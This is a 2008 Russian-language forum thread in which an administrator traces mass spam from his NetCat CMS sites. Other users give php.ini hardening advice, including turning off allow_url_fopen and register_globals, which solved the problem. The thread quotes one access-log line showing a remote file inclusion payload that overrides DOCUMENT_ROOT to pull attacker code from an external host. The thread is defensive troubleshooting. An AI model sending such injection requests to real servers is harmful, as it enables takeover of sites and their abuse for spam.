URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID8
Нить номер: 5873
[ Назад ]

Исходное сообщение
"Спамят через скрипт //index.php?_SERVER%5bDOCUMENT_ROOT - CMS NetCat"
Отправлено sdelali , 14-Июл-08 16:16

Приветствую!
Обнаружилась следующая проблема на сайтах использующих NetCat Small Business:
Отсылается 200 тыс. писем спама через сайты на сервере. Сначала подумал что это бот спамит через форму обратной связи (несмотря на капчу). Проверив и отключив раздел Обратная связь выяснил что поток писем валится дальше. Решил проверить access.log апача и увидел сотни вот таких запросов с разных IP.
91.121.24.157 - - [14/Jul/2008:15:49:15 +0400] "POST //index.php?_SERVER[DOCUMENT_ROOT]=http://geocities.com/abugag/inbox.txt? HTTP/1.1" 404 22531 "http://www.мойдомен.ru//index.php?_SERVER[DOCUMENT_ROOT]=http://geocities.com/abugag/inbox.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Т. е. видно что через подмену DOCUMENT_ROOT выполняется такой код - http://geocities.com/abugag/inbox.txt
Пробовал и специальный s_extract.inc.php подключать, и документ рут прописывать явно - не помогает.
Может в php.ini какую то функцию отключить можно, запрещающую выполнять код на чужом сайте?
Пока отключил функцию mail совсем - т. к. забивался maillog - место заканчивалось - и БД MySQl поверждались (((
Обсуждение также на офсайте CMS - http://netcat.ru/support/ncforum/?Subdiv_ID=1&Topic_ID=813

Содержание

Спамят через скрипт //index.php?_SERVER%5bDOCUMENT_ROOT - CM...,zeiter, 16:25 , 14-Июл-08
- Спасибо - полегчало,sdelali, 12:28 , 16-Июл-08
  - Спасибо - полегчало,anonymous, 06:39 , 18-Июл-08
    - Спасибо - полегчало,sdelali, 10:27 , 18-Июл-08
      - Спасибо - полегчало,anonymous, 18:52 , 18-Июл-08
  - Спасибо - полегчало,Pahanivo, 07:50 , 23-Июл-08

Сообщения в этом обсуждении

"Спамят через скрипт //index.php?_SERVER%5bDOCUMENT_ROOT - CM..."
Отправлено zeiter , 14-Июл-08 16:25

Для PHP4 ставим в php.ini:
allow_url_fopen = Off
Для PHP5 ставим в php.ini:
allow_url_fopen = Off
и/или
allow_url_include = Off
Можно к этому добавить еще
safe_mode = On
Но прежде всего (я так полагаю, что включены "глобальные") выключить:
register_globals = Off

"Спасибо - полегчало"
Отправлено sdelali , 16-Июл-08 12:28

При отключенных safe_mode и register_globals CMS не работает, а вот указанная zeiter функция allow_url_fopen = Off в php.ini помогла решить проблему.
Во всяком случае процессы sendmail запускаются, но спам уже не идет.
Респект за быструю помощь!

"Спасибо - полегчало"
Отправлено anonymous , 18-Июл-08 06:39

>При отключенных safe_mode и register_globals CMS не работает
Выкинь эту CMS. Ты её в каменном веке нашёл?

"Спасибо - полегчало"
Отправлено sdelali , 18-Июл-08 10:27

> Выкинь эту CMS. Ты её в каменном веке нашёл?
Версия просто старая - Small Business, больше не поддерживается разработчиком - www.netcat.ru
А так из альтернатив среди российских CMS - только 1С-Битрикс. Так для него вообще на 1 сайт выделенный сервер нужен. )))

"Спасибо - полегчало"
Отправлено anonymous , 18-Июл-08 18:52

>Версия просто старая - Small Business, больше не поддерживается разработчиком - www.netcat.ru
Вот видишь, даже разработчик уже забил на эту каку.

"Спасибо - полегчало"
Отправлено Pahanivo , 23-Июл-08 07:50

Тыб вообще почитал на тему "безопасность apache + php", и что такое safe мода и как она работает и зачем вообще нужна, а то изза таких как ты приходится постоянно боротся со спамом.